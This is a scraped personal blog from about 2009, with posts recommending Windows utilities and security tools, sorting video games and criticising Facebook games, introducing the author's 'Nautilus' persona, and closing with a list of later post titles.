Internet Download Manager** :**My personal favourite download manager. Others that you may be interested in are : Orbit , DownThemAll! ( a firefox extension). Helps me keep a track on what I’m downloading right now, and speed benefits are downright clear. I also like its feature to capture downloads from any application, so I don’t have to wait for those updates taking forever to download. Downloads using batch files, schedulers, and even turns off your computer when its done.
Everything** : **I should have put this above all in the list. This is such a good tool, I cannot overestimate its importance. What it basically does is searches “Everything”. The tool does not index file contents/properties, and only maintains an index of file names. As such it is blazingly fast, and searches all my applications/music/files damn quick. With an efficient shortcut(such as Win+S), you’re on your way to becoming a windows power user. On the downside, once you start using this real frequently, you tend to get a little disorganized putting stuff everywhere, knowing you will find it with Everything. Here’s a link to the website. (MUST USE)
Browsers : In browsers, I currently use a combination of Google Chrome/Firefox as my primary browser, updated to the latest dev build, and last stable beta respectively. Both of these are great, and I prefer Firefox with its huge base of extensions available. And if someone is out there using IE still, please switch immediately. Firefox is such a great way to browse with, and Chrome such a ease on the eyes. Its hard for me to pick between the two, I’ll rather wait and watch over the next year, where each one stands. Safari and Opera come a distant second for me with Safari being the better one.
File Tools : I use 7-zip for compression purposes, CCleaner to rid my computer of junk, Defraggler to defragment my hard disk, Recuva from the same company to restore those accidently deleted files.Another tool I would mention here is “GoodSync” which i use to sync my usb drive and my Documents. I also use it to organize my Start Menu, using a Dock folder in my Desktop, which i sync to the Start Menu. Dropbox is the best tool I use for my syncing purposes, between different computers. It offers 2 gb for starters, and all the sync is on the fly, meaning you just copy things to your Dropbox folder, which is automatically synced to all of your computer. It is also a great way to sync your projects with different people.
**Multimedia : **I prefer Windows Media Player 11 for audio, and VLC for video viewing. With my NowPlaying gadget, and GTalk in sync with WMP, its easy to change tracks, and let others know what you’re listening to. I also use Zune occasionally when I’m in the mood of a pure music experience. Pictures are pretty easy to manage with Windows built in Photo Gallery, or its live version. Also check out picasa, google’s free photo management tool.
Office Tools :I am currently using a Technical Preview Beta of Office 2010, for documents,presentations. Notepad++ for text and code editing, Foxit PDF Reader for ebooks, and reading stuff, which is way faster, and smaller than that Bloated Adobe Acrobat Reader. I use Windows Live Writer, which offers a lot of plugins to edit posts, including this one.Offline gmail and Google Docs capability is way cooler than you think. Do try it out
Anti Virus : This is one of the areas where I am consulted the most. Which antivirus to use? Well I would recommend you Kaspersky if you’re ready to shell out some money with a little slowing down to your system or use “Microsoft Security Essentials” which I currently use. It is quick, doesn’t hog down my system, stops real time protection when i want it to, excludes some of my dangerous folders from being scanned and nuked, updates itself, detects almost any virus I dare to throw at it, and looks neat. On the downside, however it is just minimal, with no support for hosts file scanning, white listing, firewall, cookie management, user control, among other “high level stuff” that other anti viruses offer. But I like it, have been consistently using it for last 3 months, and am pretty sure I’m virus free. It does have a catch : you must own a valid, genuine copy of Windows to use the tool.
Security Tools : Security Tools includes those nifty small programs that help me keep my computer safe, and sound. This listing comprises of tools I would suggest to the average user, I personally use a combination more than the following tools:
- AMPAWSmasherX :Stops antiviruses from using your pen drive as a medium, by blocking that autorun.inf file. You might not find the tool easily available for download, but if you do, its a pretty good one.
- SpyBot Search & Destroy : This is a one stop protection for all malware. Keep the definitions updated, however, and you will find that infections are pretty easy to deal with.
- HiJack This : Must use every 2 weeks or so. Shows you anything that has been changed from normal settings on your computer,and allows you to change it to default. Use carefully, as it may cause instability on your system later on, as it is quite a powerful tool, and if you don’t know what to do, generate your report, and post it online in one of the help forums.
- WinPatrol : This is also a must-use program for securing your computer against anything “unwanted” which may include viruses, malware, additional crapware, fake windows services, hidden files, and the like. This is basically a watchdog(Scotty), which keeps a watch on any new startup programs (my favorite), and file extension changes, and new services and the like. If Scotty detects an unwanted change in your system, it barks and reminds you of the change and asks you if you’d like to keep it. It also allows you to add/remove/delay your startup programs list, and is my favourite program of the lot.
**Other Tools : **I would just like to recommend some more everyday helpful tools to you, in no particular order. Try them out, you might like them or not, but they are definitely worth checking out : TeraCopy, AveThumbnail Resizer, TuneUpUtilities, VistaGlazz(must use for including transparency in title bar, appwiz.cpl, WinBubbles, Privoxy, TaskBar Shuffle, Paint.NET, DupFiles, WinDirStat, OverDisk (both for checking disk usage), PMenu(especially if you use portable programs in you usb drive, or for assigning Win+ hotkeys to programs, like I use Win+P=paint, N=notepad), Nero Free version among others (Refer below for a complete listing)
**Looks : **Looks are necessary part of making your computer shine out in the crowd. And I use the least required programs for that purpose. Using Tune Up’s styler to change my login Screen, and my personal wallpaper collection which I shuffle through using “Vortec Wallpaper changer”, a utility i built. Using Vista Glazz to patch my theme files to support 3rd party themes, I use themes downloaded from “deviantArt”. I also iconized my taskbar, for efficiently managing taskbar, and changed the quick launch icon size to large(looks cool). QTTab Bar is also a cool addition to Windows installing tabbed browsing in Windows Explorer. The current theme I use is “Cleaero”, and it gives me some cool transparency. I also use PowerMenu(another must use)for adding transparency, or changing priority of any window. I love it when my firefox window is transparent and I’m browsing while watching a video in the background. That is damn-right as cool as it gets without using Windows Blinds. And choosing the coolest gadgets can make all the difference, so see if you can find the right ones!

Complete Listing of Tools

The above was just a partial listing of the programs that I use. I generated a file listing of all the sofwares that I using four different methods. All of these are in text files, that you may use, with one exception. The easiest one is a tree map generated for my Dock Folder(list.dock). I generate a listing of all exe files inside my program files(which may not be complete since many like Chrome are installed in userdata folder). This one is renamed as list.exe.txt. Next I generate a listing of all installed programs using Hijack this!, called list.hijack. Another one was compiled using windirstat (list.windirstat). Using OverDisk I generated a virtual folder view of my Apps directory(this one’s huge at 2.x mb). Then I zipped them up and post them here. Browse through them, you might find a lesser used unknown app here. Especially check out the “tiny” folder. It is literally legendary, with tons of stuff! And one more thing, use OverDisk to open the ovd file.

Download Here – Listings

This list was composed by Capt. Nemo as a recommendation for non-power users of Windows. You are free to check out any of the programs, most of them are freeware, if not open source, and do not pose a harm to your computer. However if anything happens to your computer by these tools I am NOT responsible for the usage of the tool. And I try to use open-source/freeware tools as far as possible. If you use a commercial tool, do remember to pay the author, and stand against piracy. Otherwise use “Free as in Beer” tools like me!

Games to play and not to play

2009-11-23T00:00:00+00:00

This article has been bubbling in my mind for quite some time, and I’ve decided to steam it off. There are games that you must play, like Mario or Contra. Then there are games that you play (Counter Strike, AoE). Some games you wish you could play (Assassin’s Creed, Far Cry). Games you should play (Braid, Minesweeper, Spore). And finally come the games you must NEVER play (Farmville, World Of Warcraft, Mafia Wars, School Of Magic and the like). Why this categorization? Because I recently decided to leave School Of Magic on facebook after a week long affair where I reached lvl 15, and was about to get into “thick of things” as they say. Why? Because I realized that SOM is not a true game. A game is supposed to be entertaining, and indulgive. If it tells me to do something, I must do it because I take interest in it. Not to get ahead of my peers. I recently came across an article by Jonathan Blow, my favourite game designer (Braid). He opened my mind to the fact that “A Game is a form of art”.

You may not agree with this statement right now, but consider James Cameron’s Avatar, which looks so close to real, yet is live 3d. It does look kind of gamer-ish, doesn’t it? And we all agree that cinemas, and literature are a part of our culture, part of our art. But as movies get closer to games(Resident Evil, Prince Of Persia), the same is happening the other way around. Games are becoming a part of our art culture. Games like Bio-Shock, and Fear portray the doomed versions of our future. The designer behind these games did not just say, let’s make another FPS, where you kill everything that moves (that was Doom 1,2 by the way). They decided to create a realistic storyline, and a better game play. That is as innovative as it takes to get the feel of the game to the player. Let us now take up some of these categories I defined quickly.

Games You Must Play

These are the kind of games, that each of us has played. They remind us of how we first stared at that green background trying to figure out the next play in Solitaire. Or the joy of ducking under the dragon and touching that axe in Mario. These games still remind us about the giant leap that the gaming industry has taken. For Dave, Wolf-3d, Roadrash, we have reached graphics quality that surpasses HD (Call Of Duty Modern Warfare 2)

Games You Play

Skip this if you aren’t a gamer. If you’re one, well you know the games I’m talking about. Nothing beats taking a frag with a deagle. Other than maybe shouting 14 before all those AoE games. Its the thrill, and excitement, and your love of the game that keeps you glued to the seat. I won’t call these games entirely unethical, because the game play here is fair enough, and exciting. You know what you’re doing, and why. And its not just because of that score, or frag. It is also because of the satisfaction that you get after that frag.

Games You Wish You Could Play

Sometimes you Graphics Card isn’t all that powerful, or you just can’t find a torrent/download link for the game. Sometimes 10GB games do seem big. And sometimes, as in the case of FIESTA, the game hasn’t been launched for PC.

Games You Should Play

These are the games that really matter. That form of the core of my “games are art” theory. Games like Braid, Osmos, Minesweeper, Prince Of Persia (not all), Tomb Raider (again not all parts). These games take you into their own world, where you get to learn, listen, think, and observe. Where you play the game because its exciting, and fun, and you want to play it. Not because someone is offering you a “level up” if you click on a button.

Games You Should Never Play

If once is not enough, I repeat, Stay away from these games. Please, these hacked up versions of the same code, or sometimes game idea, do not deserve to be called as games. Mafia Wars, Restaurant, Cafe Shop, and all of those mindless facebook games come here. And so do War Of Warcraft, Travian, NFS Pro Street(that was just a bad game). These so-called-games

do nothing to entertain you
offer you nothing but just-another-level-up
never “teach” something (play braid, you’ll understand what I mean)
have nothing interesting

Then what is the reason that they are so hyped, and most played MMORPGs? The reason is lack of better games. Lack of games that exist on facebook and is not-another-clone-of-mafia-wars. Lack of games that adhere to strict design ideas. Do not take me wrong. There are some serious game designers who are talented, but the truth is that they are forced to make what sells, and what sells is Mafia Wars. Unfortunately. And these people are forced to work for such games. Wasting their talent on such mindless games. And if all of this wasn’t enough read this quote by the CEO of Mafia Wars :

I knew that i wanted to control my destiny, so I knew I needed revenues, right, fucking, now. Like I needed revenues now. So I funded the company myself but I did every horrible thing in the book to, just to get revenues right away. I mean we gave our users poker chips if they downloaded this zwinky toolbar which was like, I dont know, I downloaded it once and couldn’t get rid of it. laughs We did anything possible just to just get revenues so that we could grow and be a real business…So control your destiny. So that was a big lesson, controlling your business. So by the time we raised money we were profitable.

Read the entire story on facebook gaming scams here. And if you’re with me, try picking up some better titles instead of playing these nonsense games on FB

Welcome Aboard The Nautilus

2009-11-19T00:00:00+00:00

This is my first real post on my brand new blog at wordpress, and quite seriously, I’m thrilled to get a new start. I hope this project would flourish unlike many of the other things I took up (Kasiasi, Papercut,…). I have not yet completely given up on Papercut, and I really liked the Google Sites interface, but posting online, and editing it takes time. So this is my first attempt at publishing offline edited work, using Windows Live Writer. I’ll try to use other options as well, and let you know which I like best.

Now for some blogging stuff. What’s happening aboard the Nautilus? What is the Nautilus, and who is Capt. Nemo ? Let me answer these these three questions in my introductory post first. It all began in Kota, when I was a JEE student vying to enter the holiest institutes of the country, the IIT. And what I was doing there was, well studying and playing Age Of Empires, with my two best friends, Sankalp (aka General Hendrix) and Shundi (aka DR. Lecter). And our trio was one of the most feared AoE clans in Kota. We were playing together in perfect team play, and knew every counter there was to know, and every fact in the guidebook.

There was just a little flaw, I didn’t have a name. I used to play under various names, like Godfather, Eragon, and of course Harry Potter, but none of these stuck, and I was still nameless. I was like Maerad in the The Gift, looking for her true name. That night I went sleepless, and searched my inner soul for my True name. Both of my teammates already had titles (one doctor, and other a general), so I decided I would get one as well. And after storming by brain for all the books I’ve read, and all those movies, I settled for Capt. Nemo. Where did I get the name from? It was from a book called “20,000 Leagues under the sea”, by the immortal master of Sc-Fi, Jules Verne. The character of Capt. Nemo was one of most mysterious you could ever see. And one of the most brilliant. And I got it when I’d read it for the umpteenth time, Capt. Nemo wasn’t an enigma. Just because he didn’t fit into the definition of a hero doesn’t make him a villain. I could go on and on about the character, but that would take up space, which I’m determined to use to answer the other 2 questions.

So what is the Nautilus. I call pretty much everything I own, the Nautilus. Why? Because that was Capt. Nemo’s masterpiece. His submarine, and the very first, at least on paper.And my room and my laptop are labelled as Nautilus . And this blog is the path that I follow “Aboard The Nautilus”. That brings me to the third question, what I’ve been doing lately?

Lately I’ve been playing around with PHP a lot, and mind you it is really cool. I might post some of my experiences with PHP later on. And the reason I’ve been playing with PHP is because I’ve been working on my own website(its not exactly mine, its under Web Designing Section, IITR, but I’ve written 95% of its code). I’ll be launching soon, under a limited beta, so keep watching. I’ve also been working on the second issue of Criitique, an e-magazine for the youth. With kick-ass articles you are sure to like it. Do check it at www.criitique.com. Playing Age Of Empires is now a daily affair for me now, and I’ve been working my way up and down my timings. For those interested, my timings currently are “13,20,35 with 27,28-29 pop. I’ve been tweeting a lot, and I still don’t know why the twitter fad isn’t catching up in India. Twitter is fast, and easy, so why don’t people use it? Any ideas? Let me know.

I’ve also got to study, with my end sems coming up, and this seems to be the time to do it. Got any more brainstorming ideas to work on? Wanna work with me? Join the fun Aboard The Nautilus

As an update, Windows Live Writer refused to connect to my blog and I finnaly used BlogDesk to publish my post. And I also tried Qumana, and wBlogger, and FYI, none of them work.

Nemo's Home

Amazon Order History Encryption Bypass

Request My Data

Writing on books - Fantastic Beasts and Where to Find Them

Analysing the Indian government cyberspace

List of GoI websites

Sanskari Proxy

Cyberspace Ownership

What next?

The game breaking Deal Breaker card

Games should be fun2

Players are disincentivized from playing the Just Say No card.

The mere existence of the Deal Breaker card breaks the game by making the Just Say No card unplayable and worthless.4

A survey of OneCardToRuleThemAll companies

Curve (2015-)

Coin (YC W13) (2012-2017)

Plastc (2014-2017)

Stratos (2015-2015)

Swyp (2014-2017)

Final (YC W15) (2014-2017)

Indian Landscape

His Dark Materials Season 1 Readthrough

Overall

Chapter 1

Chapter 2

Chapter 3

Chapter 4

Chapter 5

Chapter 6

Learnings

Star Wars Beskar Viewing Order

The Beskar Order

Inspiration

Rationale

Why not include __?

FAQ

More Rationale (SPOILERS AHEAD)

My Setup: Passwords, 2FA, and Yubikeys

Passwords

Mobile Passwords

~/.password-store/.gpg-id

GPG

SSH

U2F

Root-of-Identity

Recovery/Backup codes and Security Questions

Failure Scenarios

Yubikey failures

Device failures

Circular dependency against GitLab

Lost Key

Malware

Improvements

Travel Plans

Domain Ownership

2FA Recovery Guides

Fidesmo Card

U2F on iPhone

Full Disk Encryption using a Yubikey

2FA on my email account

Recovery/Backup codes and Security Questions

FAQ

Why do you have stuff configured on your GMail? Aren’t you anti-Google?

What do you recommend I use?

Why are you so paranoid?

Why not recommend open source keys instead?

Downgrading my iPad 2 to iOS 8

Steps:

Security Notes

Cleaning up Google Purchases

Warning about Deletions

Migrating DNSCrypt Server to Docker

Directory Structure

Running the Container

Future Scope

Stripping Audible DRM

References

Kindle Hacks, A Self-guide

Jailbreak

Maintaining the Jailbreak

Games should be fun²

The mere existence of the Deal Breaker card breaks the game by making the Just Say No card unplayable and worthless.⁴

`~/.password-store/.gpg-id`